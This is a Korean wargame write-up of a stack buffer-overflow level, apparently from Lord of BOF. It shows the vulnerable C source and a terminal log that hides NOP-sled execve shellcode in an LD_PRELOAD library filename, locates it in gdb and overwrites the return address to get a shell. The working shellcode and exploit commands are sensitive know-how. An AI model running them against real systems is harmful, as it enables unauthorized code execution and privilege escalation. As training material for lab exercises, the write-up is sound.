..
..나는누구..?
...여긴어디....?
이번 문제(뿐만 아니라 모든 문제들)에 한줄기 빛을 떨궈준 cd80형에게 엄청난 감사를 표하는 바입니다.
그래도 LD_PRELOAD쓰는방법은 모름미다. 알거같은데 시도를 안해봤어여. 해봐야징.
[(http://cd80.tistory.com)☜☜ 엄청난 시스해커 블로그!클릭클릭]
로그:
//소스를 처음에 봤는데 memset쪽이 뭔소린지 이해안가서 소스에따가 열씨미 주석달았습니다.
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
// Target program of this level, reproduced as the author pasted it.
// Two things to notice before reading the body: the missing return type
// means implicit `int`, and strcpy()/memset() are used without
// <string.h>, so both go through implicit declarations (a pre-C99 habit
// that a modern compiler rejects).
main(int argc, char *argv[])
{
char buffer[40];
int i; // declared but never used
if(argc < 2){
printf("argv error\n"); // no argument supplied: bail out
exit(0);
}
// Byte 48 of argv[1] must be 0xbf. There is no length check first, so a
// shorter argument makes this read past the string's terminator.
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// Unbounded copy of argv[1] into a 40-byte array: this is the overflow
// the level is built around. A bounded copy such as
// snprintf(buffer, sizeof buffer, "%s", argv[1]) would close it.
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// stack destroyer!
// Zeroes the 40-byte buffer plus 4 bytes after it (presumably the saved
// frame pointer on this 32-bit layout -- TODO confirm). Offsets 44..47,
// where the 0xbf-terminated word checked above ends up, are left alone.
memset(buffer, 0, 44);
// Zeroes everything from buffer+48 up to 0xbfffffff. Pointer arithmetic
// past the end of `buffer` and the (int) cast of a pointer are undefined
// behaviour; this only "works" on the original 32-bit, non-randomized
// target, where the stack appears to end just below 0xc0000000 (the gdb
// dumps in the log show 0xbffffxxx addresses). Note that it clears only
// addresses *above* the frame: whatever the loader or environment left
// at lower addresses is untouched, which is the gap this writeup relies
// on. If buffer+48 ever sat above 0xbfffffff the size would go negative
// and wrap to a huge size_t.
memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
/* memset(destination, value, length): 0xbfffffff - (int)(buffer+48) is
   the distance from buffer+48 to the top of the stack, so the whole
   region past the return address is wiped. */
}
[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f"'`
[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f"'`
[skeleton@localhost skeleton]$ gcc -shared -fPIC asdf.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so
//여기서 쉘코드랑 놉썰매를 넣어여. 찾기 쉬워지거든여. 썰매도타공
[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so
//LD_PRELOAD에 쉘코드뭉치를 넣어요.
[skeleton@localhost skeleton]$ gdb -q nolam core
Core was generated by ` '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /home/skeleton/j
XRh//shh/binRSÍ̀.so...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbfbfbfbf in ?? ()
(gdb) q
[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[skeleton@localhost skeleton]$ gdb -q nolam core
Core was generated by ` '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /home/skeleton/j
XRh//shh/binRSÍ̀.so...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbfbfbfbf in ?? ()
(gdb) x/100wx 0xbfff0000
0xbfff0000: Cannot access memory at address 0xbfff0000
(gdb) x/100wx 0xbffff000
0xbffff000: 0x000005c9 0x0000029f 0x000006a6 0x0000045f
0xbffff010: 0x000006dd 0x000004a6 0x00000000 0x00000620
0xbffff020: 0x0000051e 0x00000000 0x00000584 0x0000069c
[중략..]
0xbffff610: 0x6b732f65 0x74656c65 0x902f6e6f 0x90909090
0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff630: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb)
0xbffff640: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff650: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff660: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff670: 0x90909090 0x90909090 0x90909090 0x6a909090
0xbffff680: 0x5299580b 0x732f2f68 0x622f6868 0xe3896e69
0xbffff690: 0xe1895352 0x732e80cd 0x4000006f 0x40013868
0xbffff6a0: 0x4000220c 0xbffffbd1 0x00000000 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x40014a00 0x00000000
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff700: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff710: 0xbffff608 0x00060000 0x00000000 0x00000000
(gdb) q
[skeleton@localhost skeleton]$ vi `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c
[skeleton@localhost skeleton]$ gcc -shared -fPIC `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so
[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so
[skeleton@localhost skeleton]$ cat `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c
#include<stdio.h>
/* Throwaway body for the shared object built in the log above. It is
 * never intended to run; the writeup only cares about the .so file name. */
int main(void)
{
    /* Same text as before, no format directives, so fputs is equivalent. */
    fputs("wat do i do", stdout);
    /* Only the low 8 bits reach the shell: 31337 & 0xff == 41. */
    return 31337;
} // placeholder source, nothing of substance here
[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[skeleton@localhost skeleton]$ gdb -q nolam core
Core was generated by ` '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /home/skeleton/j
XRh//shh/binRSÍ̀.so...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbfbfbfbf in ?? ()
(gdb) x/100wx 0xbfff0000
0xbfff0000: Cannot access memory at address 0xbfff0000
(gdb)
0xbfff0004: Cannot access memory at address 0xbfff0004
(gdb) x/100wx 0xbfff5000
0xbfff5000: Cannot access memory at address 0xbfff5000
(gdb) x/100wx 0xbfff9000
0xbfff9000: Cannot access memory at address 0xbfff9000
(gdb) x/100wx 0xbfffb000
0xbfffb000: Cannot access memory at address 0xbfffb000
(gdb) x/100wx 0xbfffd000
0xbfffd000: Cannot access memory at address 0xbfffd000
(gdb) x/100wx 0xbffff000 //일케 하나하나 스택을 올라감미다
0xbffff000: 0x000005c9 0x0000029f 0x000006a6 0x0000045f
0xbffff010: 0x000006dd 0x000004a6 0x00000000 0x00000620
0xbffff020: 0x0000051e 0x00000000 0x00000584 0x0000069c
0xbffff030: 0x00000716 0x0000054d 0x00000527 0x000004ed
0xbffff040: 0x000003a1 0x00000458 0x00000466 0x0000063f
0xbffff050: 0x00000000 0x000001ca 0x00000000 0x0000027f
[중략..]
0xbffff600: 0x6b732f65 0x74656c65 0x902f6e6f 0x90909090
0xbffff610: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff630: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff640: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff650: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff660: 0x90909090 0x90909090 0x90909090 0x6a909090
0xbffff670: 0x5299580b 0x732f2f68 0x622f6868 0xe3896e69
0xbffff680: 0xe1895352 0x732e80cd 0x4000006f 0x40013868
0xbffff690: 0x4000220c 0xbffffbbc 0x00000000 0x00000000
0xbffff6a0: 0x00000000 0x00000000 0x40014a00 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff700: 0xbffff5f8 0x00060000 0x00000000 0x00000000
0xbffff710: 0x00000000 0x00000001 0x00000000 0x00000000
0xbffff720: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff730: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff740: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff750: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff760: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff770: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff780: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) q
The program is running. Exit anyway? (y or n) y
[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`
ö ¿
bash$ q
sh: q: command not found
bash$ exit
exit
[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`
ö ¿
bash$ my-pass
euid = 511
방식을 안 후에도 삽질을 많이 했는데, 처음엔 "막 뭐 소스의 함수를 후킹하라는건갘ㅋㅋㅋㅋ아닐텐뎈ㅋㅋ"이러며 웃고있다가 LD_PRELOAD는 환경변수잖아여. 그래서 쉐어드 라이브러리명만 쉘코드로 해놨더니 이게 동적링크인걸로 알고있는데 그래서 쉘코드 안떠서..는 뻥이고요 지금보니까 소중히 잘 들어있네 난 무슨뻘짓을 한거지.
암튼 LD_PRELOAD란 공유라이브러리를 프로그램 실행전에 들고와서 스택에 고이고이 저장해둡니다. 찾아보니 그냥 스택에 찌꺼기가 남는다던데 그 이유는 뭔가 좀 복잡하다고 합니다. 그래서 음 그냥 공유라이브러리 파일명을 쉘코드로 하면 됬네여. 그렇네. ㅠ. 풀이 방법을 글로 읽기만 하고 시도해본거라 제가 했다고 할 수는 없지만 다음번에 또 써보고 싶은 기법이에여. 간지나잖아 처음에 코드보고 멘붕했는데 그것도 괜찮아진것 같고요 뭐 여러모로 멘붕이었지만 뿌듯하네요 횡설수설 잡담읽어주셔서 감사합니다. 배고프다. 모두들 안녕히주무세여 가정에 평화가 깃들기를